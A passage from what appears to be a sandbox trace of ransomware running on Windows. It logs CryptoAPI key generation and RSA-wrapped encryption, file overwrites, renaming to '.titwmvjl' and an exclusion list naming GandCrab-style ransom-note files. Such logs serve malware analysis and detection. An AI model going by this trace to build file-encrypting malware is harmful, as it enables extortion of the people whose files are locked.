phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0094.467] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.468] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.468] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.468] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0094.468] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.468] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.468] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.469] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0094.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.469] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5035b8) returned 1 [0094.469] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.470] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0094.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.470] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0094.470] GetLastError () returned 0x0 [0094.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.470] CryptDestroyKey (hKey=0x5035b8) returned 1 [0094.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.470] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.470] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.471] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0094.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.471] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x5035b8) returned 1 [0094.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.471] CryptGetKeyParam (in: hKey=0x5035b8, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0094.471] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.472] CryptEncrypt (in: hKey=0x5035b8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0094.472] GetLastError () returned 0x0 [0094.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.472] CryptDestroyKey (hKey=0x5035b8) returned 1 [0094.472] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.472] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.472] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.472] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.473] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0xcf37, lpOverlapped=0x0) returned 1 [0094.485] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xffff30c9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.485] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xcf37, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0xcf37, lpOverlapped=0x0) returned 1 [0094.486] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.486] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0094.488] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.493] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.493] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.493] CloseHandle (hObject=0x2cc) returned 1 [0094.494] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\EXjve3jGvH0u_m.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\exjve3jgvh0u_m.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\EXjve3jGvH0u_m.gif.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\exjve3jgvh0u_m.gif.titwmvjl"), dwFlags=0x1) returned 1 [0094.495] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.495] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0094.495] lstrcmpW (lpString1="KwBNqPqafvMJVN.gif", lpString2=".") returned 1 [0094.495] lstrcmpW (lpString1="KwBNqPqafvMJVN.gif", lpString2="..") returned 1 [0094.495] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\", lpString2="KwBNqPqafvMJVN.gif" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\KwBNqPqafvMJVN.gif") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\KwBNqPqafvMJVN.gif" [0094.495] lstrlenW (lpString=".titwmvjl") returned 9 [0094.495] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\KwBNqPqafvMJVN.gif") returned 85 [0094.495] VirtualAlloc (lpAddress=0x0, dwSize=0xea, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.495] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\KwBNqPqafvMJVN.gif.titwmvjl") returned 94 [0094.495] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\KwBNqPqafvMJVN.gif") returned 85 [0094.495] lstrlenW (lpString=".gif") returned 4 [0094.496] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.496] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".gif ") returned 5 [0094.496] lstrcmpiW (lpString1=".gif", lpString2=".titwmvjl") returned -1 [0094.496] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\KwBNqPqafvMJVN.gif") returned 85 [0094.496] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\KwBNqPqafvMJVN.gif") returned 85 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="desktop.ini") returned 1 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="autorun.inf") returned 1 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="ntuser.dat") returned -1 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="iconcache.db") returned 1 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="bootsect.bak") returned 1 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="boot.ini") returned 1 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="ntuser.dat.log") returned -1 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="thumbs.db") returned -1 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="KRAB-DECRYPT.html") returned 1 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="CRAB-DECRYPT.html") returned 1 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="KRAB-DECRYPT.txt") returned 1 [0094.496] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="CRAB-DECRYPT.txt") returned 1 [0094.497] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="ntldr") returned -1 [0094.497] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="NTDETECT.COM") returned -1 [0094.497] lstrcmpiW (lpString1="KwBNqPqafvMJVN.gif", lpString2="Bootfont.bin") returned 1 [0094.497] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\KwBNqPqafvMJVN.gif") returned 85 [0094.497] lstrlenW (lpString=".gif") returned 4 [0094.497] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.497] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".gif ") returned 5 [0094.497] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.497] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.497] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\KwBNqPqafvMJVN.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\kwbnqpqafvmjvn.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2cc [0094.498] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.498] ReadFile (in: hFile=0x2cc, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259ea20*=0x21c, lpOverlapped=0x0) returned 1 [0094.499] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.499] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.499] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0094.499] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.500] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.500] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.500] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259e9dc | out: pbBuffer=0x259e9dc) returned 1 [0094.500] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.501] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.501] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.501] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.501] CryptAcquireContextW (in: phProv=0x259e950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e950*=0x4c9980) returned 1 [0094.501] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0094.502] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0094.502] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0094.502] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259e9fc | out: pbBuffer=0x259e9fc) returned 1 [0094.502] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.502] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.502] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.502] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.503] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0094.503] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.503] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503278) returned 1 [0094.503] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.503] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0094.503] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.504] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259e974*=0x100) returned 1 [0094.504] GetLastError () returned 0x0 [0094.504] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.504] CryptDestroyKey (hKey=0x503278) returned 1 [0094.504] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.504] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.505] CryptAcquireContextW (in: phProv=0x259e944, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e944*=0x4c9980) returned 1 [0094.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.505] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e948 | out: phKey=0x259e948*=0x503378) returned 1 [0094.505] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.506] CryptGetKeyParam (in: hKey=0x503378, dwParam=0x8, pbData=0x259e93c, pdwDataLen=0x259e940, dwFlags=0x0 | out: pbData=0x259e93c*=0x800, pdwDataLen=0x259e940*=0x4) returned 1 [0094.506] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.506] CryptEncrypt (in: hKey=0x503378, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259e974*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259e974*=0x100) returned 1 [0094.506] GetLastError () returned 0x0 [0094.506] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.506] CryptDestroyKey (hKey=0x503378) returned 1 [0094.506] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0094.507] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0094.507] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0094.507] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0094.507] ReadFile (in: hFile=0x2cc, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259ea20, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259ea20*=0xaf3, lpOverlapped=0x0) returned 1 [0094.520] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0xfffff50d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.521] WriteFile (in: hFile=0x2cc, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0xaf3, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259ea04*=0xaf3, lpOverlapped=0x0) returned 1 [0094.522] SetFilePointerEx (in: hFile=0x2cc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.522] WriteFile (in: hFile=0x2cc, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259ea04, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259ea04*=0x21c, lpOverlapped=0x0) returned 1 [0094.523] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.526] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.527] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.527] CloseHandle (hObject=0x2cc) returned 1 [0094.527] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\KwBNqPqafvMJVN.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\kwbnqpqafvmjvn.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\KwBNqPqafvMJVN.gif.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\dp__bieng9\\3fmls7\\kwbnqpqafvmjvn.gif.titwmvjl"), dwFlags=0x1) returned 1 [0094.528] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.528] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 1 [0094.528] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2=".") returned 1 [0094.528] lstrcmpW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="..") returned 1 [0094.528] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\", lpString2="TITWMVJL-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\TITWMVJL-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\TITWMVJL-DECRYPT.txt" [0094.528] lstrlenW (lpString=".titwmvjl") returned 9 [0094.528] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\TITWMVJL-DECRYPT.txt") returned 87 [0094.528] VirtualAlloc (lpAddress=0x0, dwSize=0xee, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.528] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\TITWMVJL-DECRYPT.txt.titwmvjl") returned 96 [0094.528] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\TITWMVJL-DECRYPT.txt") returned 87 [0094.528] lstrlenW (lpString=".txt") returned 4 [0094.528] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.529] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".txt ") returned 5 [0094.529] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0094.529] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.529] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\TITWMVJL-DECRYPT.txt") returned 87 [0094.529] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\3fMls7\\TITWMVJL-DECRYPT.txt") returned 87 [0094.529] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0094.529] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0094.529] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat") returned 1 [0094.529] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0094.529] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0094.529] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="boot.ini") returned 1 [0094.529] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="ntuser.dat.log") returned 1 [0094.529] lstrcmpiW (lpString1="TITWMVJL-DECRYPT.txt", lpString2="thumbs.db") returned 1 [0094.529] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.529] FindNextFileW (in: hFindFile=0x503778, lpFindFileData=0x259ead4 | out: lpFindFileData=0x259ead4) returned 0 [0094.529] FindClose (in: hFindFile=0x503778 | out: hFindFile=0x503778) returned 1 [0094.530] CloseHandle (hObject=0x2c4) returned 1 [0094.530] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0094.530] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0094.530] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0094.530] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\d2ca4a09d2ca4deb61a.lock" [0094.531] lstrlenW (lpString=".titwmvjl") returned 9 [0094.531] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\d2ca4a09d2ca4deb61a.lock") returned 84 [0094.531] VirtualAlloc (lpAddress=0x0, dwSize=0xe8, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.531] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 93 [0094.531] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\d2ca4a09d2ca4deb61a.lock") returned 84 [0094.531] lstrlenW (lpString=".lock") returned 5 [0094.531] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.531] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0094.531] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.531] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.531] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259ed68 | out: lpFindFileData=0x259ed68) returned 1 [0094.532] lstrcmpW (lpString1="nStrFlun.jpg", lpString2=".") returned 1 [0094.532] lstrcmpW (lpString1="nStrFlun.jpg", lpString2="..") returned 1 [0094.532] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\", lpString2="nStrFlun.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\nStrFlun.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\nStrFlun.jpg" [0094.532] lstrlenW (lpString=".titwmvjl") returned 9 [0094.532] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\nStrFlun.jpg") returned 72 [0094.532] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.532] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\nStrFlun.jpg.titwmvjl") returned 81 [0094.532] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\nStrFlun.jpg") returned 72 [0094.532] lstrlenW (lpString=".jpg") returned 4 [0094.532] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.532] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".jpg ") returned 5 [0094.532] lstrcmpiW (lpString1=".jpg", lpString2=".titwmvjl") returned -1 [0094.532] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.532] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\nStrFlun.jpg") returned 72 [0094.532] lstrlenW 